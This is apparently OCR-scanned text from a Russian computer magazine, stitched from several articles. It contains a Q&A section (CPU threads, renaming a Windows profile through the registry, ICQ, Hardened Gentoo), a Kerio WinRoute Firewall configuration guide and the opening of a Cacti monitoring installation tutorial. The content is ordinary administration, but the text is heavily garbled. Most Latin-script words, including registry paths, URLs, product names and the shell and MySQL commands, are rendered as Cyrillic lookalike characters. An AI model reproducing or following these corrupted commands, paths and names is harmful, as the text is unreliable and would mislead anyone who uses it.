На однопроцессорных машинах все потоки выполняются последо- 
вательно влечение короткого промежутка времени, называемого 
квантом. Иллюзщя многозадачности создаетсядіишь за счет быстрого 
переключения между потоками. При наличии двух и более процессо- 
ров несколько потоков может выполняться параллельно, увеличивая 
производительность системы. Однако и тут все нетак просто: сплош- 
ные грабли и подводные, камни. Если поток А ждет результата вычис- 
лений потока Б, то на многопроцессорной машине они выполняются 
также медленно, как и на однопроцессорной. То же самое происходит 
в случае, если с^мый ресурсоемкий процесс (например, программа 
для- сжатия цифрового видео) имеет единственный вычислительный 
поток. 

О: Какже тогда добиться увеличения производительности? 

А: Важно понять, что разбивка процесса на потоки происходит на 
стадии проектирования приложения и конечный пользователь 
повлиять Нанеенев силах. Но даже если приложение содержит два 
и более вычислительных потока, то у нас нет никаких гарантий, что на 
многопроцессорной машине они будут выполняться быстрее, чем на 
однопроцессорной. Почему? Да потому, что каждый процессор имеет 
" свои собственный кэш, и если потоки разделяют общие данные, то 
межпроцессорный обмен через системную шину способен съесть весь 
выигрыш в производительности! Эту проблему решают многоядерные 
процессоры, имеющие общий кэш, соединенный сверхбыстрой внутри 
кристальной локальной шиной. 

Совсем другое дело — кластер. Компьютеры, объединенные в единую 
вычислительную машину через ЕНпегпеЦ показывают чудеса произ- 
водительности только в том случае, если каждый из них обрабаты- 
вает «свою» порцию данных независимо от остальных, возвращая 
тол ькорезультат вычислений. Опять-таки протоколы обмена дан- 
ными закладываются разработчиками приложений, и пользователь 
вынужден использовать то, что дают, потому что другого не будет. Тем 
не менее, начиная с ѴѴІпсІоѵѵв Эегѵег 2003 и Ѵібіъ, Мі сгозоІЧ включила 
в систему поддержку удаленных потоков, способных исполняться на 
соседних компьютерах. Строго говоря, понятие удаленных пото- 
ков (РетдІеТЬгеасІ) существовало еще во времена ЫТ, однако эта 
«удаленность» относилась ксоседним процессам, исполняющимся 
натойжесамоймашине.ав Висте это ограничение наконец-то снято. 
Более того, система позволяет самостоятельно раскидывать потоки по 
разным машинам, еслті видит в этом необходимость (то есть ожидает 
увеличения производительности), и пользователю заботиться об этом 
уже не нужно. 



О: Как переименовать пользователя в Винде так, чтобы переимено- 
вать и каталог профайла? 

А: С-ам несколько раз сталкивалея-с ситуацией; когда-нужно-было ■ 
переименовать пользовательский аккаунт в Винде. Если просто 
поменять имя через панель управления, то все файлы, относящиеся 
к профилю, останутся на том же самом месте. Название каталога не 
меняется И выдает старое имя. Какэто исправить? Сама Місгозо^ 
предлагает следующий алгоритм действий: 

1 . Входимъ систему под аккаунтом с правами администратора (но, 
естественно, не подтем, который нужно переименовать). 



2 . Даем каталогу с профилем новое имя: с °/о5у5іетВгіѵе%\Ооситепі5 
апсі 5еШпдз\01сІІІ5егпате на %5у5іетВгіѵе%\ОосиппепІ5 апб 5еШпдз\ 
[ЧеѵѵІІзегпате. 

3. Теперь ковыряемся в реестре, в котором есть специальный ключ 

- РгобІеБЫ: Н КЕУ_Ю САЦ_МАСНІЫ Е\50 БТѴѴАК Е\М істозоЦѴѴѴі псІо.\л/5 
ЫТ\(Еи ггеп1;Ѵе гзіс|п\РгоІі ІеНзж 

Он вювою очередь содержит подключи с параметрами аккаунтов, 
представляющие собой списки так называемых ІІвег Ассоипі БесигТу 
“Уѳ-п4ібег5 (-БіЩ-Н^Іодобный идендитификатор имеется у каждого 
аккаунта и внешне выглядит примерно так: 5-1 -5-21 -220523388- 
2147195339-725345543-501. 

Нам нужно изменить путь до файлов профиля, но обратиться к его 
"настройкам можнотолько через его-5Ю. Для того чтобы выяснить 
идентификатор любого аккаунта из системы, достаточно запустить 
простенький скрипт ( ЬирУМіпсІоѵѵъхр.тѵрз.огд/гед/БІРизЕѵЬз ). 

Далее находим в РгоШеЫз!; нужный 51 Б, который принадлежит пере- 
именованному аккаунту, там — опцию РгобІеІппадеРаіІі и указываем 
в ее значении новый путь (%5уз1ет0гіѵе%\Воситепіз апб 5еШпдз\ 
ЫеѵѵІІзегпате). 

4 . Перезагружаемся. 

О: Что такое номер-невидимка в ІСО? 

А: Номер считается полностью невидимым, если его нельзя найти 
общим поиском через ѴѴЬІіеРадез, йоонтемнеменее полностью 
работоспособен и имеетсвой идентификатор и пароль. Таким статусом 
обладают номера, которые гарантированно не использовались ни 
кем более шести лет. При этом из базы удаляется вся информация 
о етаіі-адресах и очищается список контактов, поэтому получение 
такого номера сравнимо с регистрацией нового. Первый же введен- 
ный етаіі-адрес в ІІзег Беіаііз станет Ргітагу, и с его помощью можно 
задать вопросы и ответы для восстановления пароля в случае беды. 

И еще. Чтобы такой номер появился в поиске и в каталогах ІСО, доста- 
точно просто заполнить одно любое поле ІІзег Беіъііз. 

О: Многие сейчас трубят о Нагсіепесі Сепіею. Чем он отличается от 
обычного бепіоо? 

А: Нагсіепесі Ѳепіоо ( ѵѵѵѵѵѵ.депіоо.огд/рго]Уеп/Ьагбепес1 ) — это над- 
стройка над системой, которая заключается в нескольких изменениях 
в компиляторе и ядре, нацеленных на увел ичение общей безопасно- 
сти системы. Обнювленъый компилялюр-^Ьагбеашіщ^ - 

защитить компилируемые им программы от взлома. Одна из при- 
меняемых методик — 55 Р (5іаск-зтазЫпд ргоіесііоп) — добавляет 
в би на рн и к за щиту от переполнения буфера. Откомпилированная 
подобным образом программа сама выгружает из себя из памяти, если 
обнаруживает переполнение. Ядро Нагсіепесі Оепіоо предотвраща- 
ет всевозмюжные переполнения, и, помимо этого, запрещает массу 
потенциально опасных операций. Например, РаХ позволяетзапретить 
выполнение кода в страницах памяти сданными. Получается про- 
граммная реализация защитного ЫХ-бита, который появился только в 
64-битных процах Іпіеі. Вообще говоря, Нагсіепесі бепіоо — это лишь 
набор уже готовых инструментов для защиты системы, их можно было 
бы установить и на многие другие Ыпих’ы. Но здесь все собрано в 
одном месте, все готово к работе. ИЯ 
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Марш-бросок 

В БОЛЬШУЮ СЕТЬ 



КЕШ0ѴѴІМК01ЯЕРІКЕѴѴАІ-І-: КОМПЛЕКСНОЕ РЕШЕНИЕ ДЛЯ ОРГАНИЗАЦИИ ДОСТУПАВ ИНТЕРНЕТ 

Организация совместного доступа в интернет и защита компьютерных сетей от атак хакеров — это только 
часть задач, возлагаемых на системного администратора. Корпоративная версия межсетевого экрана от 
компании Кегіо ТесЬпоІо^іез, предназначенная для защиты сетей предприятий малого и среднего бизнеса, 
позволяет не только настроить выход в интернет, но и обеспечить защиту от внешних атак и вирусов. Кро- 
ме того, в КѴѴР заложена возможность ограничения доступа пользователей к веб-сайтам, что позволяет 
реализовывать весьма жесткие политики и экономить трафик. 



ВОЗМОЖНОСТИ КЕШО ѴУШКОІГГЕ РІВЕѴѴАІ_І_ 6 

Прежде чем приступить к установке, следует кратко познакомиться с 
возможностями, которые предоставляет КѴѴР. Ведь именно функцио- 
нальность позволяет определить, подходит это ПО или нет. КѴѴР является 
комплексным решением с единым интерфейсом, упрощающим настрой- 
ку и сопровождение, то есть в одной упаковке мы получаем целый спектр 
весьма полезных возможностей, которых небольшим организациям 
хватит с головой. 

Кроме КАТ и прокси-сервера, использование которых позволяет 
соединять локальную сеть с интернетом через один общий ІР-адрес, в 
его состав включен ѴРК-сервер, обеспечивающий соединение по двум 
направлениям: «сервер — сервер» и «сервер — клиент». В последнем 
случае на компьютере удаленного клиента устанавливается Кегіо ѴРК 
СНепИ. Обычно ѴРК и КАТ не очень любят друг друга. В Кегіо реализована 
своя технология работы с каналами ѴРК. Использование технологии 



КАТ Тгаѵегзаі обеспечивает стабильную работу ѴРК с КАТ, в том числе и с 
множественными КАТ-шлюзами. Кроме этого, в КѴѴР встроена поддерж- 
ка ІРЗес и РРТР, что позволяет создавать ѴРК-соединения только штат- 
ными средствами ѴѴіпсІоѵѵз и КѴѴР. Начиная с версии 6.1, в КѴѴР появился 
новый веб-сервис СІіепПезз ЗЗЬ ѴРК, обеспечивающий клиентам доступ 
к сети ѴРК через обычный веб-браузер без установки специального ПО. 
Поддерживаются все возможные виды доступа в интернет: біаі-ир, ІЗПК, 
РРРоЕ, ѴѴі-Рі и другие. Пользователи могут разделять и совместно ис- 
пользовать одно соединение с возможностью автоматической установки 
резервного канала. Очень гибко реализована работа с пользователями, 
для конкретной учетной записи можно устанавливать и применять 
различные ограничения, например работа только с етаіі, ограниче- 
ния на использование трафика задень, месяц. Существует вариант 
регистрации пользователя КѴѴР перед выходом в интернет, при этом 
может применяться как внутренняя база пользователей, так и Місгозой 
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Асііѵе Эігестгу. Опционально предоставляется возможность проверки 
входящего и исходящего почтового, РТР- и НТТР-трафика интегрирован- 
ным антивирусом МсАіее, хотя можно подключить антивирус от других 
производителей. Для блокировки трафика с нежелательных ресурсов 
используется контентная фильтрация и защита веб-трафика. Так, в 
настройках фильтра 133 Огап§е \УеЪ Рікег доступно 58 возможных кате- 
горий сайтов, Р2Р Еіітіпаіог автоматически обнаруживает и блокирует 
пиринговые сети, такие как Кагаа. Контентная фильтрация позволяет 
блокировать потенциально опасные или нежелательные типы файлов 
(исполняемые, музыка, видео и прочее), а также всплывающие окна. 
После установки администратор управляет работой различных 
компонентов КѴѴЕ как локально, так и удаленно, через консоль Кегіо 
Асітіпізігайоп Сопзоіе. О важных событиях (таких как отсутствие соеди- 
нения, обнаружение вируса, превышение лимита и т.д.) администратор 
получает уведомления. Разобраться в использовании трафика поможет 
подробная гистограмма и статистика посещения веб-страниц. 

В лицензии число пользователей определяется как количество ІР-адре- 
сов (не компьютеров), защищаемых файрволом. Количество учетных за- 
писей пользователей, работающих с прокси-сервером, неограниченно. 

УСТАНОВКА КЕКІО ѴѴІЫКСШТЕ ПРЕДАН 

Для установки КѴѴЕ потребуется компьютер класса Репііит III, рабо- 
тающий под управлением ѴѴіпсІоѵѵз 2000/ХР/2003/Ѵізі:а. Поскольку 
КѴУР будет первым встречать хакеров, должны быть установлены все 
доступные обновления, а система не должна содержать лишнего ПО. В 
документации приведен список программ, при наличии которых Кегіо 
работать откажется. Здесь и прокси-серверы, и сетевые и персональные 
межсетевые экраны, и софт для создания ѴРК. Также перед установкой 
следует настроить все сетевые интерфейсы и маршрутизацию. 

В целом установка происходит без особых трудностей. В процессе 
предстоит сделать выбор между двумя ее типами: полной и выбо- 
рочной. Последний вариант позволяет указать на устанавливаемые 
элементы (зачем нам хелп на чешском?) . Кроме всего прочего, этот 
вариант следует выбирать для установки Асітіпізігаііоп Сопзоіе на 
удаленной системе. Далее указываем пароль администратора и на 
следующем шаге установкой флажка ЕпаЫе Кетоіе Ассезз разрешаем 
удаленное управление. В Кетоіе ІР асМгезз вводим адрес компьютера, 
с которого будет управляться КѴѴЕ. Затем выскочит сообщение о том, 
что программное обеспечение для Кегіо ѴРК Абаріег проверено не 
было, кнопкой «Продолжить» продолжаем установку. Если в процессе 
установки будут обнаружены сервисы, несовместимые с КѴѴЕ, посту- 
пит предложение их отключить. После инсталляции понадобится 
перезагрузить компьютер. 



ПЕРВЫЙ ЗАПУСК 

После перезагрузки в трее появится значок монитора ѴѴіпКоиіе, из 
меню которого можно запускать/останавливать сервис, устанавливать 
параметры запуска при загрузке системы и вызывать консоль управ- 
ления. Итак, дважды щелкаем по значку и регистрируемся, введя в 
окне Кеѵѵ Соппесііоп пароль администратора и адрес сервера. Если все 
правильно, после нажатия на кнопку Соппесі появится основное окно 
настроек. Интерфейс выполнен традиционно. Все настройки указаны в 
виде дерева с четырьмя основными пунктами: Сопй^игаііоп, Изегз апб 
Сгоирз, Біаіиз, Ьо§з. Выбрав нужный подпункт, в большом окне справа 
получаем доступные настройки. Единственное, что может отпугнуть, 
— отсутствие русскоязычного интерфейса и файла помощи. Хотя, 
поискав в интернете, можно найти перевод документации (например, 
ѵлллѵ.іпіегпеіассеззтопцог.сот/гиз/зиррогі/босзЛѵіпгоиіе) . 

После установки весь трафик заблокирован, поэтому первичная 
настройка может производиться локально или с компьютера с ІР-адре- 
сом, указанным при установке. Начинающие администраторы сочтут 
удобным наличие мастера, позволяющего выполнить первоначальную 
настройку всего за 8 шагов. На первых трех этапах указывается тип 
подключения к провайдеру, в следующем окне — основные параметры 
соединения (логин, пароль и прочее) . Четвертый шаг ключевой: здесь 
выбираются разрешенные сервисы, соединения для которых будут 
беспрепятственно проходить через брандмауэр. Большинство новичков, 
чтобы упростить себе жизнь, включают «АИоѵѵ ассезз іо аіі зегѵісез», раз- 
решая таким образом все соединения. Лучшим вариантом будет выбор 
«АИоѵѵ ассезз іо ійе Го11о\ѵіп§ зегѵісез опіу» и установка флажка напротив 
разрешенных протоколов. В этом окне доступны параметры, разре- 
шающие почтовый, НТТР/НТТР8- и ЕТР-трафик, ОКБ-запросы, а также 
Іеіпеі-сессии. Все эти службы, кроме последней, являются востребо- 
ванными в любой организации. Если чего-то не хватает, лучше открыть 
нужный порт вручную, чем заранее подвергать свою сеть опасности. На 
пятом шаге разрешаем создание правил для встроенного ѴРК-сервера и 
Сііепііезз ББЬ ѴРК. Если используется внешний сервер ѴРК, все флажки 
необходимо снять. В следующем окне настраивается доступ к внутрен- 
ним ресурсам сети извне. По умолчанию открыты сервисы ѴРК и НТТРБ, 
расположенные на компьютере с КѴѴЕ. Используя кнопки АсМ, ЕсЫ, 
Кетоѵе, можно соответственно добавить, отредактировать и удалить 
правило. В окне, которое появляется при добавлении или редактирова- 
нии файла, следует выбрать сервис из списка Бегѵісе и указать ІР-адрес 
компьютера, на котором он запущен. Следующий шаг имеет всего один 
параметр — ЕпаЫе КАТ, он разрешает трансляцию адресов. После на- 
жатия кнопки Еіпізіі будут созданы и добавлены новые правила. Теперь 
основные настройки осуществлены, и, если все сделано правильно, КѴѴЕ 
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Официальный сайт 
КѴѴР находится по 
адресу ѵѵѵѵѵѵ. кегіо . 
сот/кѵѵк российское 
зеркало — 
ѵѵѵѵѵѵ.ѵѵіпгоиіе.ги . 



обеспечит совместный доступ пользователей в интернет 
и блокировку соединений по портам, не указанным в ходе 
настроек. Но это далеко не все его возможности. 

СЕТЕВЫЕ НАСТРОЙКИ И ПОЛИТИКИ ТРАФИКА 

После появления в сети КѴѴР телефон администратора 
быстро начнет плавиться от звонков пользователей, которые 
будут жаловаться, что не могут подключиться к их любимой 
аське или другому сервису, не разрешенному при первичной 
настройке. Поэтому, если политика компании не запрещает 
использование этих служб, их необходимо разрешить. Все 
основные настройки производятся в меню СопП^игагіош. 
Для начала переходим во вкладку ІШегГасез и проверяем пра- 
вильность настройки всех сетевых соединений. Для удобства 
их можно переименовать. В контекстном меню выбираем 
пункт ЕбК и в поле ІШеИасе пате вводим новое имя. Напри- 
мер, для интернет-соединения можно использовать ѴѴАЛ. 
Вкладка Соппесгіоп Раііоѵег позволяет указать альтернатив- 
ное интернет-соединение, которое будет автоматически ус- 
тановлено при обнаружении обрыва основного . В качестве 
альтернативного соединения может использоваться любой 
сетевой интерфейс или удаленное соединение из вкладки 
ІШеНасез. Следует помнить, что для альтернативного соеди- 
нения также необходимо настраивать правила доступа и 
фильтрацию. 

После установки КѴѴР импортирует системную таблицу мар- 
шрутизации, если все настроено правильно, то проблем быть 
не должно. Просмотреть и при необходимости подправить 
таблицы можно, перейдя в Коийп§ТаЫе. Многие методы 
подключения, вроде РРРоЕ или диалапа, после установле- 
ния связи изменяют маршрут по умолчанию. В этом случае 
Кегіо может выдавать сообщение о том, что обнаружено два 
сМаик-маршрута, но ничего страшного в этом нет. 

Теперь переходим в ТгаШс Роіісу. Здесь мы видим все 
правила, созданные с помощью мастера. Последним стоит 
ПеГаик гиіе, запрещающее все соединения. Программа 
просматривает все правила сверху вниз. Поэтому все па- 
кеты, не попавшие под критерии правила, стоящего выше, 
будут отброшены. Нажатием кнопок Асій и Кетоѵе правила 
можно добавлять и удалять, а также менять их очередность с 
помощью кнопок со стрелками или мышки. 

Каждое правило содержит несколько полей: 

1 . Иате — название правила; здесь лучше использовать 
интуитивно понятное описание, чтобы затем легче было 



разобраться с его назначением. Сняв флажок, находящийся 
рядом с именем, можно временно отключить правило, не 
удаляя его. 

2. Зоигсе и Оезйпагіоп — адрес отправителя и получателя; в 
этом поле можно указать узел, диапазон адресов, сеть, сете- 
вой интерфейс, пользователя или группу пользователей. 

3. Зегѵісе — сервис; в этом поле может указываться назва- 
ние сервиса, порт или диапазон портов, протокол. 

4. Асйоп — действие; здесь возможны три варианта (в 
Оеішік гиіе — два): Решік — разрешить, Эепу — запретитьи 
Пгор — отбросить. 

5. Ьо§ — включается ведение журнала событий по указан- 
ному правилу. При установке Ьо§ таі:сЫп§ раскеЩ в журнал 
будут занесены все пакеты, попадающие под правило, то 
есть как прошедшие брандмауэр, так и отброшенные; при 
Ьо§ таі:сЫп§ соппесгіопз — соединения, удовлетворяющие 
правилу. 

6. Тгапзіайоп — активация преобразования ІР-адресов 
источника и получателя. 

Кроме этого, два поля по умолчанию скрыты. Чтобы их 
увидеть, следует выбрать в контекстном меню пункт Мойку 
Соіитпз. В поле Ѵаіісі оп указывается интервал времени, в 
течение которого будет действовать правило. По умолчанию 
предлагается только одно значение — Аіѵѵауз, дополни- 
тельные промежутки времени добавляются во вкладке 
«ПеГіпкіопз -> Тіте Кап§е$». При создании правил можно 
указать интервал, соответствующий рабочему времени. 
Допустим, когда все служащие разойдутся по домам, мы раз- 
решим получение обновлений антивирусных баз и систем, а 
весь остальной трафик заблокируем. Поле РгоГосоІ ІпзресГог 
позволяет указать анализатор протокола, который будет 
применяться ко всему трафику, удовлетворяющему правилу. 
Значение Алу в любом поле означает все возможные вари- 
анты. В полях Зоигсе, Пезйпагіоп и Зегѵісе можно указывать 
несколько значений. Чтобы все изменения вступили в силу, 
необходимо нажать кнопку Арріу. 

КЭШИРОВАНИЕ ВЕБ-СТРАНИЦ И ВИЗ-ЗАПРОСОВ 

Кроме фильтрации, Кегіо позволяет ускорить серфинг, кэ- 
шируя информацию и запросы. Так, модуль ПИЗ Рогѵѵагйег, 
параметры которого находятся в одноименной вкладке, 
ускоряет ответы на повторяющиеся ПИЗ-запросы. При этом 
в клиентских настройках в качестве ПИЗ -сервера можно 
указать адрес шлюза, на котором установлен КѴѴР. По 
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умолчанию этот модуль включен и настроен так, что все ЭИЗ-запросы 
пересылаются ЭИЗ-серверу, который определен для внешнего сетевого 
интерфейса; полученный ответ кэшируется. Во вкладке можно очистить 
кэш или добавить запись в Ііозііз-файл. 

Входящий в состав НТТР-прокси по умолчанию также активирован, поэтому, 
помимо использования КАТ, клиенты могут выходить в интернет, подключа- 
ясь через 3128-й порт Кегіо. Его настройки расположены во вкладке «СоШеШ 
Рікегіп§ -> НТТР Роіісу -> Ргоху Зегѵег». НТТР-прокси может понадобиться в 
случае, когда нет прямого соединения. Например, твой провайдер использует 
прокси. ѴѴіпКоШе умеет передавать все запросы следующему прокси-серверу, 
его данные достаточно указать в поле Ропѵагсі ГО рагеШ ргоху зегѵег. 
Настройка кэширования веб-страниц производится в «НТТР Роіісу -> 
СасЬе», по умолчанию эта функциональность отключена. Установка 
флажка «ЕпаЫе сасйе оп Папзрагет ргоху» разрешит кэширование стра- 
ниц при прямом соединении (порты 80 и 443), а «ЕпаЫе сасйе оп ргоху 
зегѵег» — кеширование запросов, произведенных через прокси. 

ФИЛЬТРАЦИЯ КОНТЕНТА 

Как уже говорилось, в КѴУР заложены широкие возможности по фильт- 
рации трафика по протоколам НТТР и РТР. В СоШеШ Рікегіп§ есть три 
подпункта, отвечающих за свои участки работы: НТТР Роіісу, РТР Роіісу 
иАшіѵігиз. 

Подпункт РТР Киіез и вкладка ИКР Киіез в НТТР Роіісу по принципу на- 
строек несколько напоминают задание правил межсетевого экрана. Для 
наглядности остановлюсь на ИКР Киіез. Так, в поле Сопбійопз задается 
ИКР, маска или группа объектов, указанных во вкладке ІЖР Сгоир, а 
в поле Асйоп — действие, которое будет выполнено при совпадении 
правила. Вариантами реакции могут быть разрешение (Регтп) и бло- 
кировка (Эгор) ресурса. Вкладка ИКР Сгоир содержит список шаблонов, 
которые встречаются в определенной группе веб-страниц, например 
баннеры, поисковики, серверы обновлений. Это позволяет установить 
правила сразу для определенного типа запрашиваемых страниц. 
Некоторые поля скрыты. Открыв их, можно установить временной 
интервал (ѴаІісіТіте) и указать пользователей (ІІзегРізі) или группу 
компьютеров (ІР Сгоирз), для которых будет действовать правило. 
Дополнительные проверки и запреты для разрешающего правила зада- 
ются во вкладке СоШеШ Киіез редактора свойств правил. Здесь можно 
разрешить (АПоѵѵ) или заблокировать (Эепу) активное содержимое веб- 
страниц (АсгіѵеХ, ІаѵаЗсгірЩ, Іаѵа, гебегег) . При выборе варианта Оебаик 
будут использованы общие настройки, взятые из одноименной вкладки 
в корне НТТР Роіісу. Установка флажка «Зсап соШеШз бог ѵігизез ассогбіп§ 
ГО зсаппіп§ гиіез» разрешит проверку всего трафика, попадающего под 
это правило, антивирусной программой. А активация «Эепу ѴѴеЪ ра§ез 
сотаіпіп§...» будет блокировать страницы, в которых содержатся слова, 



определенные в разделе РогЬШбеп ѴѴогсІз. По умолчанию в этом разделе 
собраны слова, которые встречаются на порнографических и варезных 
ресурсах. При необходимости очень просто добавить туда новое слово 
или отредактировать уже имеющиеся, например, изменив вес слова. 
Осталась лишь одна непосещенная вкладка — 155 Огап§еѴѴеЬ Рікег. Здесь для 
определения характера ресурса применяется система оценки веб-страниц 
155/СоЬіоп. Эта система использует единую базу данных ресурсов, рассорти- 
рованных по категориям. Результат работы этой системы — разрешение или 
запрет на посещение выбранной веб-страницы. Этот фильтр требует отдель- 
ной лицензии, но бежать выкладывать свои кровные не стоит — эффектив- 
ность этой технологии вне англоязычных ресурсов крайне низка. 

Как уже отмечалось ранее, ѴѴіпКоШе умеет проверять файлы, переда- 
ваемые по протоколам НТТР, РТР, ЗМТР и РОРЗ, с помощью антиви- 
русной программы. По умолчанию проверка производится с помощью 
интегрированного антивируса МсАбее. Поддерживается несколько 
других антивирусов, разрабатываемых компаниями Езеі: Зобгѵѵаге, 
Сгізобі:, Р-5есиге и другими, есть в списке и СІатАѴ. Во вкладке Ашіѵігиз 
выбирается сам движок и тип трафика, в поле ЕпаЫе Ше зіге Іітк при 
необходимости можно выставить максимальный размер проверяемого 
файла, в ІШе^гаГОсІ Ашіѵігиз Еп^іпе указывается интервал обновления 
баз интегрированного антивируса. В НТТР, РТР 5саппіп§ для НТТР- и 
РТР-прото колов можно указать, какие типы файлов следует, а какие не 
следует сканировать на вирусы. 

Блокировка Р2Р-сетей вынесена в отдельную вкладку. Найти ее можно, 
перейдя в «Абѵапсеб Орйопз -> Р2Р ЕІітіпаГОг». Учитывая распределен- 
ный характер пиринговых сетей, их разношерстность и хитрость пользо- 
вателей, выявлять и блокировать такие соединения довольно проблема- 
тично. Если Р2Р ЕІітіпаГОг обнаружит попытку соединения с Р2Р-сетью, 
он полностью блокирует выход в интернет с этих узлов (Віоск аіі ітаббіс об 
Ле коз!) или разрешит соединения только с определенными сервисами 
СВІоск ггаббіс ехсерпйе ргебебіпесі зегѵісез) . При выборе второго варианта 
нажатием Зегѵісез следует отобрать неблокируемые протоколы. Продол- 
жительность блокировки указывается в поле «Віоск ітаббіс бог . . . тіпшез», 
а чтобы пользователь знал, почему он не может воспользоваться 
любимым Ослом, следует установить флажок «Іпбогт гііе изег Ьу етаіі». 
Нажатие на Абѵапсесі позволит установить параметры обнаружения 
пиринговых сетей, здесь указываются Р2Р-порты, а в Соппесйоп соиш 
определяется минимальное число одновременных соединений, при 
превышении которых начнется проверка на соединение с Р2Р. 

Мы рассмотрели только самые основные параметры, позволяющие 
настроить доступ в интернет, и уделили особое внимание защите сети 
и фильтрации трафика. За кадром остались работа с пользователями, 
настройка ѴРИ, сбор статистики и многие другие вопросы, разобраться с 
которыми поможет документация, тг 
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Мониторим 

ПОДЧИНЕННЫЕ СИСТЕМЫ 

САСТІ: СИСТЕМА МОНИТОРИНГА РАБОТЫ СЕРВЕРОВ 

Несмотря на объемы современных жестких дисков и мощности процессоров, со временем перестает хва- 
тать и первого, и второго. Бывает, по непонятным причинам отваливаются сервисы, пропадают каналы, 
появляется еще много разных проблем. Без постоянного мониторинга системных ресурсов и используе- 
мых сервисов администратору довольно сложно обеспечить бесперебойную работу, быстро найти про- 
блемный участок или понять причину неправильной работы сервиса. 



ПРОЕКТ САСТІ 

С помощью поисковика можно обнаружить большое количество систем 
мониторинга, распространяемых по лицензии СОТ СРЬ и обладающих 
большой функциональностью. На слуху, конечно же, Иа^іоз, МКТС, 
ККЕЖюІ, множество клонов Иеі:МКС, Огеоп и т. д. К сожалению, чтобы 
настроить некоторые из них, потребуется изрядно попотеть, изучая про- 
токолы. Не каждому это понравится. Поэтому для мониторинга выберем 
Сасй Ссасй.пеН . При его разработке одними из основных требований 
были интуитивность интерфейса и легкость в использовании. Сасй явля- 
ется удобной надстройкой над ККОТооІ, его интерфейс написан на РНР, а 
для хранения информации служит МуЗС^Ь. 

Сасй без проблем работает в сетях любого размера и любой топологии, 
контролируя самые разнообразные параметры систем и сетей. В ка- 
честве источника данных используются любые внешние команды или 
сценарии, реализована поддержка ЗИМР. Результат выводится в виде 
графиков. Вообще все, что есть в Сасй, представлено графиками, даже 
параметры и настройки так или иначе привязаны к ним. Каждый гра- 
фик описывается двумя элементами: данными, которые должны быть 



представлены, и свойствами, определяющими, как должна выводиться 
информация. Параметры любого созданного графика можно просмот- 
реть и уточнить, в том числе «на лету». Используя заранее подготов- 
ленные шаблоны, графики очень легко создавать самостоятельно, без 
необходимости погружения в тонкости ККШооІз и ЗИМР. 

СТАВИМ 

Для работы Сасй потребуется наличие веб-сервера с поддержкой РНР 
(Арасйе или ИЗ), сам РНР, МуЗС^Ь, а также КШЭТооІ и пегзшпр для 
мониторинга. Для закачки доступны архивы для Ьіпих и ѴѴіпДоѵѵз, есть 
ссылки на КРМ-пакеты, еЬиіІй СепШо, ОрепЗІІЗЕ. При желании можно 
использовать СѴЗ или архив с текущей сборкой. Кроме этого, можно 
поискать нужные пакеты в репозитарии своего дистрибутива. Так, в 
ПеЬіап/НЬипт для установки Сасй достаточно ввести: 

$ зийо арЕ-деС іпзСаІІ сасЕі 

Но в данном случае я предлагаю устанавливать Сасй из исходников. Так 
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мы сможем, во-первых, исправить найденные ошибки, накатив доступ- 
ные патчи, а во-вторых, научить Сасй работать с плагинами. Установку 
производим в Шиши 7.04. Находим с помощью «зисіо арі-сасйе берепбз 
сасй» все зависимости и устанавливаем их, сам пакет сасй не ставим. 
Качаем сырцы с официального сайта: 

$ члгдек -с ѵгѵт. саскі . пек/сІоѵтІоасІз/саскі-О .8.6]. каг . дт. 

Распаковываем: 

$ ссі/ѵаг/ѵллм 

$ каг -хгѵк /ктр/саскі-0 . 8 . 6] . каг . дг 

Ставим доступные патчи: 

$ зисіо ссі саскі-0 .8.6] 

$ зисіо ѵгдеі: ѵгѵт. саскі . пей /сіоѵтіоасіз /раксйез /0.8.6] /рі 
пд_рйр_ѵегзіоп4_зптрдекпехк . ракей 

$ зисіо ѵ/дек ѵгѵт. саскі . пек /сіошііоасіз /раксйез /0 . 8 . 6] /кг 
ее_сопзо1е_тіззіпд_йозкз .райей 

$ зисіо ѵ/дек ѵгѵт. саскі . пек/ сіоѵтіоасіз /раксйез /0 . 8 . 6] /кй 
итЬпаі1_дгарйз_пок_ѵ\гогкіпд . ракой 

$ зисіо тлгдек ѵгѵт. саскі . пек /сіожііаасіз /ракейез / 0 . 8 . 6] /дг 
арй_сіеЬид_1оскир_кіх . рак ей 

$ зисіо ѵ/дек ѵтѵі. саскі . пек /сіоѵтіоасіз /раксйез /О . 8 . 6] /зп 
трма1к_кіх. рак ей 

$ зисіо ракей -рі-й < ріпд_рйр_ѵегзіоп4_зптрдекпехк . 
ракей 

$ зисіо ракей -рі-й < кгее_сопзо1е_тіззіпд_йозкз . ракей 
$ зисіо ракей -рі-й < кйитЬпаі1_дгарйз_пок_ѵ\гогкіпд . 
ракей 

$ зисіо ракей -рі-й < дгарй_с!еЬид_1оскир_кіх . ракей 
$ зисіо ракей -рі-й < зптрѵ^а1к_кіх . ракей 

Для удобства переименовываем каталог: 

$ зисіо тѵ саскі-0 .8.6] саскі 

По умолчанию Сасй плагинов не поддерживает, но эту поддержку реали- 
зовали ребята из СасйШегз Гсасйизегз.огуй предлагающие, кроме патча, 
еще с десяток плагинов различного назначения. Кстати, на этом же 
ресурсе имеется дистрибутив СасйЕ2, построенный на основе СепЮЗ. 

В нем уже есть настроенный Сасй со всеми плагинами, плюс 305 полез- 
ных пакетов, среди которых ИейЗИМР, ИеШоѵѵ, ѴѴеЬтіп, еАссеІегаіог и 
прочие. Патчим: 



$ ссі саскі 

$ ѵ/дек — с саскіизегз . огд/скжпіоасіз /саскі-ріидіп-агсй . 
каг . дг 

$ зисіо каг -хгѵк саскі-ріидіп-агсй . каг . дг 
$ зисіо ракей -рі-й < саскі-ріидіп-агсй/саскі-ріидіп- 
0.8.6] . сіікк 

Если МуЗС^Б еще не работает, запускаем: 

$ зисіо / екс / іпік . сі/шузді зкагк 
Создаем новую базу данных саскі: 

$ туздіасішіп --изег=гоок сгеаке саскі 
И заполняем ее, используя подготовленный шаблон: 

$ тузді -и гоок саскі < саскі. зді 
Теперь пользователю сасйизег даем все права на новую базу: 

$ тузді -и гоок саскі 

тузд1> СКАйТ АЬй Ой саскі.* ТО саскіизег@1оса1йозк 
ІБЕйТІЕІЕБ ВУ 7 саскіраззчлгогсі' ; 

Оиегу ОК, 0 гомз акіескесі (0.06 зес) 
шузд1> кіизй ргіѵііедез; 

Оиегу ОК, 0 гомз аккескесі (0.03 зес) 
шузд1> диік 

На этом установка закончена, переходим к настройке. 

НАСТРОЙКА САСТІ 

В конфигурационном файле указываем информацию для соединения с БД: 

$МСЕ01Т./ШСШ0Е/С0МРЮ.РНР 

$сіакаЬазе_куре = "тузді"; 

